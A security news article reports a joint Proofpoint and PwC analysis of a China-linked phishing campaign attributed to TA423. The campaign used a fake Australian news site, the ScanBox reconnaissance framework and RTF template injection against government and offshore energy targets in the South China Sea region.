Chinese Phishing Campaign Targets Victims in South China Sea
Campaign Uses ScanBox Framework and RTF Template InjectionChinese intelligence threat actors are conducting cyberespionage campaigns targeting the Australian government and corporations involved with energy extraction in the South China Sea, researchers say.
See Also: OnDemand | 2024 Phishing Insights: What 11.9 Million User Behaviors Reveal About Your Risk
The campaign's latest guise is posing as Australian online media in a bid to get victims to enable a web reconnaissance and exploitation framework dubbed ScanBox that is likely used by multiple China-based threat actors, concludes a joint report from Proofpoint and PricewaterhouseCoopers.
The two companies assess with moderate confidence the campaign, which Proofpoint began to observe in March 2021, is the work of the threat actor known as TA423 or Red Ladon. Its activities overlap with a threat actor dubbed APT40 or Leviathan.
A 2021 indictment of Chinese hackers by the U.S. Department of Justice attributed the threat actors to the Ministry of State Security of the southern Chinese province of Hainan. Proofpoint and PwC researchers say that one of TA423’s longest running areas of responsibility is assessed to include the South China Sea (see: US Indicts 4 Chinese Nationals for Lengthy Hacking Campaign).
The phishing campaign is one sign of South China Sea regional tensions, where Beijing aggressively presses disputed territorial claims. "There is a clear and upward trend of PRC provocations against South China Sea claimants and other states lawfully operating in the region," a U.S. Department of State official told a Washington think tank audience, Reuters reported earlier this summer.
TA423 supports "the Chinese government in matters related to the South China Sea, including during the recent tensions in Taiwan," says Sherrod DeGrippo, Proofpoint vice president of threat research and detection, referring to Chinese objections to a Taipei visit by U.S. House Speaker Nancy Pelosi earlier this month.
"This group specifically wants to know who is active in the region and while we can't say for certain, their focus on naval issues is likely to remain a constant priority in places like Malaysia, Singapore, Taiwan and Australia," DeGrippo says.
Among the phishing campaign's targets are organizations connected with exploitation of the Kasawari offshore gas field in Malaysia's exclusive economic zone and an offshore wind farm in the Taiwan Strait.
Attack Techniques
Scanbox is a PHP and JavaScript-based reconnaissance framework first identified in 2014. In its most recent phase, the Chinese intelligence campaign uses links in phishing emails that direct victims to a malicious website that is purportedly an Australian news media outlet.
In the latest campaign, detected in April and extending through June, threat actors targeted local and federal Australian governmental agencies, news media companies and global heavy industry manufacturers that conduct maintenance of fleets of wind turbines in the South China Sea.
These phishing campaigns originated from Gmail and Outlook email addresses. Frequently, the threat actor posed as an employee of the fictional media publication "Australian Morning News." The associated web domain contained content copied from legitimate news publications, including the BBC and Sky News.
Once the victim is redirected to the malicious site, they are served with the ScanBox framework. In the past, threat actors delivered a single block of JavaScript code but more recently have opted for a plug-in-based, modular architecture, researchers say.
The modularity is a bid to prevent crashes or errors that might tip off the owners of compromised websites, researchers say.
This modular architecture also executes a main JavaScript payload and further loads additional modules to profile the victim. Once the ScanBox is set up successfully, it connects to a command-and-control server handled by the threat actors.
Researchers say that the initial script harvests data that helps set up the following stages of information gathering and potential follow-on exploitation or compromise.
The capabilities of the initial ScanBox JavaScript executed in victims' browsers include checking if the victim's browser is Safari or Internet Explorer, verifying whether the command-and-control server is responding and sending information about the victim's browser, including the operating system and language.
RTF Template Injection
During an earlier campaign observed in March, the phishing campaigns used Rich Text Format template injection attachments leveraging template URLs customized for each target.
RTF template injection is a technique in which an RTF file containing decoy content can be altered to allow for the retrieval of content hosted at an external URL after opening an RTF file. The template is compatible with Microsoft Office, which makes it easier for a user to open or edit these documents, allowing attackers an opportunity to attack any system.
Although the campaign returned the same payload to all the victims, the URLs used were distinct. Each of them had a victim ID number that correlated to the intended victims and allowed attackers to track active infections.
"Notably, the recurring use of custom URLs that are unique to each victim, likely for infection tracking purposes, is a commonality to the ScanBox phishing URLs observed later in April 2022," researchers say.
One of the targets of the RTF campaign was a European manufacturer of heavy equipment used in building the Yunlin Offshore Wind Farm in the Taiwan Strait.